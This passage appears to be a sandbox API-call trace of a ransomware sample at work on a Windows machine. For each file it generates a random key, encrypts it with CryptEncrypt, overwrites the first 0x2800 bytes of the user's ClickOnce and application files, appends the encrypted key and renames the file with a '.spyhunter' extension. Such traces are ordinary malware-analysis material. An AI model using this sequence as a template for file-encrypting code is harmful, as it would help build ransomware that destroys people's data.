pbData=0x31f188*, pdwDataLen=0x270f3b8*=0x30) returned 1 [0132.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.477] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms") returned 159 [0132.478] StrStrW (lpFirst="clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms", lpSrch=".txt") returned 0x0 [0132.478] GetProcessHeap () returned 0x2c0000 [0132.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.478] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f37c*=0x2800, lpOverlapped=0x0) returned 1 [0132.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.479] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f37c*=0x2800, lpOverlapped=0x0) returned 1 [0132.479] GetProcessHeap () returned 0x2c0000 [0132.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.480] WriteFile (in: hFile=0x158, lpBuffer=0x270f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x270f3bc*, lpNumberOfBytesWritten=0x270f37c*=0x4, lpOverlapped=0x0) returned 1 [0132.480] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f37c*=0x30, lpOverlapped=0x0) returned 1 [0132.481] CloseHandle (hObject=0x158) returned 1 [0132.481] GetProcessHeap () returned 0x2c0000 [0132.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.481] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.spyhunter") returned 169 [0132.481] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.cdf-ms.spyhunter")) returned 1 [0132.482] GetProcessHeap () returned 0x2c0000 [0132.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.482] GetProcessHeap () returned 0x2c0000 [0132.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.482] GetProcessHeap () returned 0x2c0000 [0132.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de79f0 | out: hHeap=0x2c0000) returned 1 [0132.482] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3c0 | out: pbBuffer=0x270f3c0) returned 1 [0132.482] GetProcessHeap () returned 0x2c0000 [0132.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.482] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3b8*=0x30) returned 1 [0132.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.482] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0132.483] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".txt") returned 0x0 [0132.483] GetProcessHeap () returned 0x2c0000 [0132.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.483] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f37c*=0xee0, lpOverlapped=0x0) returned 1 [0132.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff120, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.529] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f37c*=0xee0, lpOverlapped=0x0) returned 1 [0132.529] GetProcessHeap () returned 0x2c0000 [0132.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.529] WriteFile (in: hFile=0x158, lpBuffer=0x270f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x270f3bc*, lpNumberOfBytesWritten=0x270f37c*=0x4, lpOverlapped=0x0) returned 1 [0132.529] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f37c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f37c*=0x30, lpOverlapped=0x0) returned 1 [0132.529] CloseHandle (hObject=0x158) returned 1 [0132.529] GetProcessHeap () returned 0x2c0000 [0132.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.529] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.spyhunter") returned 183 [0132.530] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.spyhunter")) returned 1 [0132.530] GetProcessHeap () returned 0x2c0000 [0132.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.530] GetProcessHeap () returned 0x2c0000 [0132.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.530] GetProcessHeap () returned 0x2c0000 [0132.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e1a8 | out: hHeap=0x2c0000) returned 1 [0132.531] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3b8 | out: pbBuffer=0x270f3b8) returned 1 [0132.531] GetProcessHeap () returned 0x2c0000 [0132.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.531] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3b0*=0x30) returned 1 [0132.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0132.531] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".txt") returned 0x0 [0132.531] GetProcessHeap () returned 0x2c0000 [0132.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.531] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f374*=0x2800, lpOverlapped=0x0) returned 1 [0132.532] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.532] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f374*=0x2800, lpOverlapped=0x0) returned 1 [0132.532] GetProcessHeap () returned 0x2c0000 [0132.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.532] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.532] WriteFile (in: hFile=0x158, lpBuffer=0x270f3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x270f3b4*, lpNumberOfBytesWritten=0x270f374*=0x4, lpOverlapped=0x0) returned 1 [0132.532] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f374*=0x30, lpOverlapped=0x0) returned 1 [0132.532] CloseHandle (hObject=0x158) returned 1 [0132.532] GetProcessHeap () returned 0x2c0000 [0132.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.533] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.spyhunter") returned 180 [0132.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.spyhunter")) returned 1 [0132.533] GetProcessHeap () returned 0x2c0000 [0132.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.534] GetProcessHeap () returned 0x2c0000 [0132.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.534] GetProcessHeap () returned 0x2c0000 [0132.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e008 | out: hHeap=0x2c0000) returned 1 [0132.534] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3b8 | out: pbBuffer=0x270f3b8) returned 1 [0132.534] GetProcessHeap () returned 0x2c0000 [0132.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3b0*=0x30) returned 1 [0132.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.534] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms") returned 168 [0132.534] StrStrW (lpFirst="clickonce_bootstrap.exe.cdf-ms", lpSrch=".txt") returned 0x0 [0132.534] GetProcessHeap () returned 0x2c0000 [0132.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.534] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f374*=0x2800, lpOverlapped=0x0) returned 1 [0132.535] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.535] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f374*=0x2800, lpOverlapped=0x0) returned 1 [0132.535] GetProcessHeap () returned 0x2c0000 [0132.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.535] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.535] WriteFile (in: hFile=0x158, lpBuffer=0x270f3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x270f3b4*, lpNumberOfBytesWritten=0x270f374*=0x4, lpOverlapped=0x0) returned 1 [0132.535] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f374, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f374*=0x30, lpOverlapped=0x0) returned 1 [0132.535] CloseHandle (hObject=0x158) returned 1 [0132.536] GetProcessHeap () returned 0x2c0000 [0132.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.536] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.spyhunter") returned 178 [0132.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.cdf-ms.spyhunter")) returned 1 [0132.536] GetProcessHeap () returned 0x2c0000 [0132.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.536] GetProcessHeap () returned 0x2c0000 [0132.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.536] GetProcessHeap () returned 0x2c0000 [0132.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31de68 | out: hHeap=0x2c0000) returned 1 [0132.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3b0 | out: pbBuffer=0x270f3b0) returned 1 [0132.537] GetProcessHeap () returned 0x2c0000 [0132.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3a8*=0x30) returned 1 [0132.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.537] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe") returned 161 [0132.537] StrStrW (lpFirst="clickonce_bootstrap.exe", lpSrch=".txt") returned 0x0 [0132.537] GetProcessHeap () returned 0x2c0000 [0132.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.537] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f36c*=0x2800, lpOverlapped=0x0) returned 1 [0132.938] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.938] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f36c*=0x2800, lpOverlapped=0x0) returned 1 [0132.939] GetProcessHeap () returned 0x2c0000 [0132.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.939] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.939] WriteFile (in: hFile=0x158, lpBuffer=0x270f3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f36c, lpOverlapped=0x0 | out: lpBuffer=0x270f3ac*, lpNumberOfBytesWritten=0x270f36c*=0x4, lpOverlapped=0x0) returned 1 [0132.972] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f36c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f36c*=0x30, lpOverlapped=0x0) returned 1 [0132.972] CloseHandle (hObject=0x158) returned 1 [0132.972] GetProcessHeap () returned 0x2c0000 [0132.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0132.972] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.spyhunter") returned 171 [0132.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.spyhunter")) returned 1 [0132.973] GetProcessHeap () returned 0x2c0000 [0132.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0132.973] GetProcessHeap () returned 0x2c0000 [0132.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0132.973] GetProcessHeap () returned 0x2c0000 [0132.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ab80 | out: hHeap=0x2c0000) returned 1 [0132.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f3a8 | out: pbBuffer=0x270f3a8) returned 1 [0132.976] GetProcessHeap () returned 0x2c0000 [0132.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0132.976] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f3a0*=0x30) returned 1 [0132.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 